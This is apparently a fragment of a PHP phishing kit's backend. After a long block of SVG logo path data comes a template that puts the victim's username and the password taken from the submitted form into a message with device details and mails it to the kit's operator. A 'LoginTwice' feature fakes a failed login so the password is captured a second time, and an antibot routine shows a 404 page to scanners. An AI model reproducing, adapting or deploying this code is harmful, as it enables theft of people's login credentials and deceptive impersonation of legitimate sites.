                            <path class="st1" d="M 609.1 802.4 C 613.1 800.9 617.2 799.5 621.3 798.2 C 622.7 801.1 618.9 801.9 617.8 804 C 615.9 807.9 615.3 812.3 614 816.5 C 619.3 820 624 824.4 629.5 827.6 C 631.4 826.9 633.2 826.9 633.8 829.1 C 629 830.9 624 832.4 619.2 834.3 C 619 833.7 618.5 832.5 618.2 831.9 C 619.6 831.3 621.1 830.6 622.6 830 C 619.4 827.1 615.7 824.6 612.1 822.1 C 611.1 825.5 610.3 828.9 609.2 832.2 C 610.4 834 612.3 833.8 614.2 833.6 C 614.4 834.2 614.6 835.3 614.8 835.8 C 610.6 837.2 606.4 838.6 602.2 839.9 C 602 839.4 601.7 838.3 601.6 837.8 C 607.6 834 607.5 826.1 609.9 820.1 C 605.5 817 601.3 813.5 596.8 810.6 C 594.9 809.9 592.2 811.2 591.5 808.4 C 596 806.8 600.6 805.2 605.1 803.5 C 605.3 804.1 605.7 805.4 605.9 806 C 604.7 806.6 603.6 807.2 602.4 807.8 C 605.4 810 608.4 812.3 611.4 814.5 C 612.3 811.1 613.8 807.9 613.8 804.3 C 612.5 804.3 611.2 804.4 609.9 804.5 C 609.7 803.8 609.4 803 609.1 802.4 Z"/>
                            <path class="st1" d="M 529.5 818 C 533.6 817.4 537.8 817.4 542 817.4 C 542 818 542 819.1 542 819.6 C 535.5 820.8 533.6 828 529.9 832.6 C 533.6 837.2 536.7 842.2 540.4 846.7 C 541.4 848.1 543.4 847.7 544.8 848.2 C 544.8 848.8 544.8 850 544.8 850.5 C 539.8 850.3 534.7 851 529.7 851 C 529.7 850.3 529.7 849 529.6 848.4 C 531.1 848.3 532.7 848.2 534.2 848.1 C 531.8 844.4 529.1 840.9 526.5 837.4 C 524.5 840.6 521.9 843.4 520.7 847 C 521.7 848.4 523.5 848.3 525 848.6 C 525 849.2 525 850.4 525 850.9 C 520.6 851 516.2 851.6 511.8 851.5 C 511.8 851 511.8 849.9 511.8 849.3 C 518.5 847.2 520.7 839.8 524.8 834.8 C 521.7 830.7 518.8 826.3 515.6 822.3 C 514.6 820.6 512.6 820.6 510.9 820.3 C 510.9 819.8 510.9 818.9 510.9 818.5 C 515.6 818 520.3 817.8 525 818 C 525.2 818.8 525.5 819.7 525.8 820.5 C 524.4 820.6 522.9 820.7 521.5 820.8 C 523.6 824 525.8 827.1 528.2 830.1 C 530 827.2 531.9 824.3 533.5 821.3 C 532 820.7 530.5 820.2 529 819.7 C 529.1 819.1 529.4 818.3 529.5 818 Z"/>
                            <path class="st7" d="M 594.1 487.2 C 596.2 486.7 598.4 486.2 600.6 485.7 C 601 493.9 602.8 502.1 601.6 510.3 C 599.2 502.6 596.5 495 594.1 487.2 Z"/>
                            <path class="st1" d="M 399.9 799.9 C 400.1 799.3 400.5 798.2 400.7 797.6 C 404.5 798.7 408.2 800 411.9 801.2 C 411.5 809.9 412.6 818.5 412.3 827.2 C 417.6 820.4 422.7 813.5 428 806.8 C 431.7 808 435.4 809.1 439 810.5 C 438.7 811.3 438.4 812.1 438.1 813 C 436.6 812.5 435.2 812.1 433.7 811.7 C 430.7 820.4 427.3 829 424.9 837.9 C 426.2 838.5 427.6 839 428.9 839.5 C 428.7 840.2 428.4 841.5 428.2 842.1 C 423.4 840.4 418.6 839 413.8 837.3 C 414 836.6 414.4 835.3 414.6 834.6 C 416.1 835.1 417.6 835.7 419.1 836.3 C 422.6 828.6 424.6 820.4 427.4 812.5 C 421 820.3 415.2 828.6 408.8 836.4 C 406.2 834.4 407.5 830.9 407.2 828.1 C 407.6 820.3 406.4 812.5 406.8 804.6 C 404.1 812.5 400.3 820.3 399.3 828.7 C 401 830 403.3 831 403.1 833.6 C 398.6 832.2 394.1 830.9 389.8 829 C 388.9 826 393.1 827.9 394.8 827.3 C 397.4 825 397.7 821.2 398.9 818.2 C 400.5 812.8 403 807.6 404 802 C 402.9 801 401.4 800.5 399.9 799.9 Z"/>
                            <path class="st10" d="M 613.1 545.8 C 618.8 547.4 624.6 549.1 630.3 550.9 C 629 552 627.6 553.2 626.3 554.3 C 622.5 553.1 618.6 551.9 614.7 550.7 C 614.2 549.1 613.7 547.4 613.1 545.8 Z"/>
                            <path class="st7" d="M 614.7 550.7 C 618.6 551.8 622.5 553 626.3 554.3 C 623.6 556.5 620.8 558.6 617.9 560.6 C 616.8 557.3 615.7 554 614.7 550.7 Z"/>
                            <path class="st11" d="M 513.6 557.6 L 514 558.1 C 514 578.6 513.6 599.1 514.2 619.5 C 488.5 631.8 461.5 641.4 434 648.7 C 460.3 618.2 487.1 588.1 513.6 557.6 Z"/>
                            <path class="st11" d="M 511.8 629.2 C 512.9 628.6 514.1 628.1 515.3 627.5 C 515 638.2 515.2 649 515.2 659.7 C 520.4 659.9 525.5 660.5 530.6 661.5 C 533.3 655.7 535.6 649.7 537.5 643.6 C 538.7 644.5 540 645.3 541.3 646.2 L 541.3 646.3 C 539.6 651.8 537.3 657.1 535.1 662.4 C 541.6 664.4 547.9 666.9 553.9 670.1 C 556.2 666.9 558.4 663.7 560.7 660.5 C 561.9 661.4 563.1 662.2 564.3 663.1 C 562.1 666.2 560 669.4 557.8 672.5 C 560 674 562.1 675.6 564.3 677.1 C 567.7 674.9 571 672.7 574.3 670.5 C 575.5 671.4 576.7 672.3 578 673.1 C 574.6 675.5 571.2 677.8 567.8 680.2 C 572.3 678.7 576.7 677 581 675.3 C 582.4 676.3 583.8 677.3 585.1 678.4 C 540 698 487 698 442 678.4 C 425.8 690.4 409.4 702.2 393.1 714.1 C 378.2 724.8 363.6 735.8 348.6 746.3 C 349.1 745.2 349.5 744.1 350.2 743.1 C 353 740.6 355.8 738.1 358.1 735.1 C 377.8 712.5 397.7 690.1 417.3 667.4 C 419.8 664.6 422.1 661.1 426 660.2 C 435.1 657.7 444.3 655.4 453.2 652.2 C 470.6 646.7 487.3 639.3 504.2 632.6 C 499.2 636.7 493.9 640.5 488.6 644.3 C 490.6 650 492.8 655.7 495.3 661.3 C 500.5 660.4 505.7 659.8 511 659.7 C 510.9 649.6 511.1 639.5 510.9 629.4 L 511.3 629.2 L 510.9 628.3 L 511.8 629.2 M 484.8 647.3 C 478.4 651.7 472.3 656.5 465.9 661 C 467.9 663.9 469.9 666.8 471.9 669.7 C 478 666.6 484.3 664 490.9 662.2 C 488.7 657.4 487.3 652.1 484.8 647.3 M 452.5 670.9 C 455.4 672.9 458.4 674.8 461.3 676.8 C 463.5 675.2 465.8 673.6 468 671.9 C 466.1 669.2 464.2 666.4 462.4 663.7 C 459 666 455.7 668.4 452.5 670.9 M 462.9 681.3 C 495.2 691.2 530.4 691.4 562.8 681.6 C 535.1 658.1 490.8 658.2 462.9 681.3 M 448.4 673.4 C 448 673.9 447.1 675 446.6 675.6 C 450 676.9 453.4 678.2 456.8 679.3 C 454.1 677.2 451.2 675.3 448.4 673.4 Z"/>
                            <path class="st12" d="M 514 558.1 C 518 562.4 522 566.7 525.8 571.2 C 534.1 581 543 590.2 550.9 600.4 C 538.9 607.1 526.8 613.7 514.3 619.5 C 513.5 599 514 578.6 514 558.1 Z"/>
                            <path class="st12" d="M 515.3 627.5 C 529.3 621.3 543.1 614.6 556.6 607.4 C 560.4 610.6 563.6 614.3 566.8 618.1 C 600.2 656.3 633.7 694.5 667.1 732.7 C 669.9 736.2 673.1 739.5 676.7 742.1 C 677.5 743.4 677.8 744.8 678.4 746.3 C 647.2 723.7 616.2 700.9 585 678.3 C 583.6 677.3 582.3 676.2 580.9 675.2 C 579.9 674.5 578.9 673.7 577.9 673 C 576.7 672.1 575.4 671.2 574.2 670.4 C 570.8 668 567.5 665.5 564.2 663 C 563 662.1 561.8 661.2 560.6 660.4 C 554.1 655.7 547.5 651.1 541.2 646.2 L 541.2 646.1 C 539.9 645.2 538.7 644.4 537.4 643.5 C 530 638.3 522.8 632.7 515.3 627.5 Z"/>
                            <path class="st7" d="M 634.4 611.2 C 640.3 614.3 645.5 618.3 650.6 622.5 C 647.6 626 644.5 629.6 641.4 633.1 C 639 625.8 636.7 618.5 634.4 611.2 Z"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(1.000000000003, 1e-12, 8e-12, 0.999999999999, -39.049959663888, 267.049989938734)" cx="870" cy="361" r="3.95"/>
                            <path class="st13" d="M 725.8 877 C 731 881 736.3 885 741.5 889.1 C 737.2 891.6 732.9 894.1 728.6 896.5 C 727.5 890.1 726.7 883.5 725.8 877 Z"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(0.999999999999, 0, 7e-12, 1.000000000002, -134.791381834631, 280.433776854937)" cx="870" cy="361" r="4.388"/>
                            <path d="M 892.863 512 C 892.863 722.345 722.345 892.863 512 892.863 C 301.655 892.863 131.137 722.345 131.137 512 C 131.137 301.655 301.655 131.137 512 131.137 C 722.345 131.137 892.863 301.655 892.863 512 Z M 512 145.278 C 309.465 145.278 145.278 309.465 145.278 512 C 145.278 714.535 309.465 878.722 512 878.722 C 714.535 878.722 878.722 714.535 878.722 512 C 878.722 309.465 714.535 145.278 512 145.278 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(255, 255, 255);"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(0.999999999997, 1e-12, -5e-12, 0.999999999998, -86.269676979342, 161.302594452886)" cx="870" cy="361" r="3.23"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(1.000000000001, 1e-12, 1e-12, 1.000000000001, -76.640357973761, 180.800125121318)" cx="870" cy="361" r="4.36"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" cx="748.528" cy="558.574" r="4.36"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" cx="748.528" cy="558.574" r="4.35" transform="matrix(0.999999999999, 2e-12, 5e-12, 0.999999999997, 3.521894870393, 31.975958315563)"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(1, -1e-12, -2e-12, 0.999999999999, -42.255036472734, 205.627783954386)" cx="870" cy="361" r="4.16"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(1.000000000001, 0, 2e-12, 1.000000000004, -28.175857784731, 193.378987906123)" cx="870" cy="361" r="4.224"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(0.999999999999, -1e-12, 6e-12, 0.999999999996, -64.821811437952, 254.068718315888)" cx="870" cy="361" r="4.388"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(0.999999999997, 3e-12, 7e-12, 1.000000000002, -602.286364315142, 115.31756007438)" cx="870" cy="361" r="3.386"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(1.000000000001, 2e-12, 7e-12, 1.000000000004, -581.767444491998, 85.667412935979)" cx="870" cy="361" r="3.033"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(1, 2e-12, 9e-12, 0.999999999997, -623.133130789401, 78.855019930179)" cx="870" cy="361" r="3.067"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(1, 1e-12, 9e-12, 1.000000000004, -652.247108697105, 97.912030816831)" cx="870" cy="361" r="3.453"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(1.000000000001, 2e-12, 1.2e-11, 1.000000000002, -662.65003979469, 88.740998087629)" cx="870" cy="361" r="2.45"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(1.000000000001, 0, 1.5e-11, 0.999999999997, -661.899652957285, 69.300350430927)" cx="870" cy="361" r="3.2"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(0.999999999999, 4e-12, 1.5e-11, 0.999999999999, -686.779348373074, 77.479414939228)" cx="870" cy="361" r="3.121"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" transform="matrix(0.999999999999, 5e-12, 6e-12, 1.000000000002, -600.424560545722, 40.924255370492)" cx="870" cy="361" r="3.228"/>
                            <g style="stroke-width: 3.05706; vector-effect: non-scaling-stroke;" transform="matrix(0.393616169691, 0, 0, 1.769162893295, 269.241851806641, -158.447540283203)">
                            <path d="M 394.314 206 L 406.127 229.627 L 382.5 229.627 L 394.314 206 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(255, 255, 255);" bx:shape="triangle 382.5 206 23.627 23.627 0.5 0 1@765df46b"/>
                            <path d="M 394.314 -253.254 L 406.127 -229.627 L 382.5 -229.627 L 394.314 -253.254 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(255, 255, 255);" transform="matrix(1, 0, 0, -1, 0, 0)" bx:shape="triangle 382.5 -253.254 23.627 23.627 0.5 0 1@c2494841"/>
                            </g>
                            <g style="stroke-width: 3.05706; vector-effect: non-scaling-stroke;" transform="matrix(0, 0.393616169691, -1.769162893295, 0, 830.697570800781, 92.591850280762)">
                            <path d="M 394.314 206 L 406.127 229.627 L 382.5 229.627 L 394.314 206 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(255, 255, 255);" bx:shape="triangle 382.5 206 23.627 23.627 0.5 0 1@765df46b"/>
                            <path d="M 394.314 -253.254 L 406.127 -229.627 L 382.5 -229.627 L 394.314 -253.254 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(255, 255, 255);" transform="matrix(1, 0, 0, -1, 0, 0)" bx:shape="triangle 382.5 -253.254 23.627 23.627 0.5 0 1@c2494841"/>
                            </g>
                            <g style="stroke-width: 3.05706; vector-effect: non-scaling-stroke;" transform="matrix(0.393616169691, 0, 0, 1.769162893295, 269.241851806641, -158.447540283203)">
                            <path d="M 394.314 206 L 406.127 229.627 L 382.5 229.627 L 394.314 206 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(255, 255, 255);" bx:shape="triangle 382.5 206 23.627 23.627 0.5 0 1@765df46b"/>
                            <path d="M 394.314 -253.254 L 406.127 -229.627 L 382.5 -229.627 L 394.314 -253.254 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(255, 255, 255);" transform="matrix(1, 0, 0, -1, 0, 0)" bx:shape="triangle 382.5 -253.254 23.627 23.627 0.5 0 1@c2494841"/>
                            </g>
                            <g style="stroke-width: 3.05706; vector-effect: non-scaling-stroke;" transform="matrix(0, 0.393616169691, -1.769162893295, 0, 830.697570800781, 92.591850280762)">
                            <path d="M 394.314 206 L 406.127 229.627 L 382.5 229.627 L 394.314 206 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(255, 255, 255);" bx:shape="triangle 382.5 206 23.627 23.627 0.5 0 1@765df46b"/>
                            <path d="M 394.314 -253.254 L 406.127 -229.627 L 382.5 -229.627 L 394.314 -253.254 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(255, 255, 255);" transform="matrix(1, 0, 0, -1, 0, 0)" bx:shape="triangle 382.5 -253.254 23.627 23.627 0.5 0 1@c2494841"/>
                            </g>
                            <g style="stroke-width: 3.05706; vector-effect: non-scaling-stroke;" transform="matrix(0.177106171846, 0.177106171846, -0.796027958393, 0.796027958393, 537.404174804688, -4.824868679047)">
                            <path d="M 394.314 206 L 406.127 229.627 L 382.5 229.627 L 394.314 206 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(255, 255, 255);" bx:shape="triangle 382.5 206 23.627 23.627 0.5 0 1@765df46b"/>
                            <path d="M 394.314 -253.254 L 406.127 -229.627 L 382.5 -229.627 L 394.314 -253.254 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(255, 255, 255);" transform="matrix(1, 0, 0, -1, 0, 0)" bx:shape="triangle 382.5 -253.254 23.627 23.627 0.5 0 1@c2494841"/>
                            </g>
                            <g style="stroke-width: 3.05706; vector-effect: non-scaling-stroke;" transform="matrix(-0.177106171846, 0.177106171846, -0.796027958393, -0.796027958393, 677.074890136719, 360.754180908203)">
                            <path d="M 394.314 206 L 406.127 229.627 L 382.5 229.627 L 394.314 206 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(255, 255, 255);" bx:shape="triangle 382.5 206 23.627 23.627 0.5 0 1@765df46b"/>
                            <path d="M 394.314 -253.254 L 406.127 -229.627 L 382.5 -229.627 L 394.314 -253.254 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(255, 255, 255);" transform="matrix(1, 0, 0, -1, 0, 0)" bx:shape="triangle 382.5 -253.254 23.627 23.627 0.5 0 1@c2494841"/>
                            </g>
                        </svg>
                    </div>
                </div>

                <div class="container">
                    <div class="mt-2">
                        <div>
                            <h3 class="text-light">🪅 Login Info</h3>
                        </div>
                        <hr>
                        <div class="mt-2">
                            <h3>Username: ' . $_SESSION['username'] . '</h3>
                        </div>
                        <div class="mt-05">
                            <h3>Password: ' . $_POST['password'] . '</h3>
                        </div>
                        <div class="mt-2">
                            <h3 class="text-light">💻 Device Info</h3>
                        </div>
                        <hr>
                        <div class="mt-2">
                            ' . $comps->userDetails() . '
                        </div>
                    </div>
                    <div class="my-3 text-center">
                        <span class="small text-light">Private page coded by <a href="https://t.me/eliseeyum">Elysium</a>, not for redistribution.</span>
                    </div>
                </div>

            ';

            if (isset($settings['LoginTwice']) && $settings['LoginTwice'] == "on") {
                if (!isset($_SESSION['loginTwice']) || !$_SESSION['loginTwice']) {
                    $_SESSION['loginTwice'] = 1;
        
                    if ($comps->mailX("(1) Login | IN PUA", $content)) {
                        die($comps->headerX("../Login/"));
                    }
                }
            
                if (isset($_SESSION['loginTwice']) && $_SESSION['loginTwice']) {
                    unset($_SESSION['loginTwice']);
                    
                    if ($comps->mailX("(2) Login | IN PUA", $content)) {
                        die($comps->headerX("../Login/oops.php"));
                    }
                }
            } else {
                die($comps->headerX("../Login/oops.php"));
            }
        }
    } else {
        echo $antibot->throw404();
        die();
    }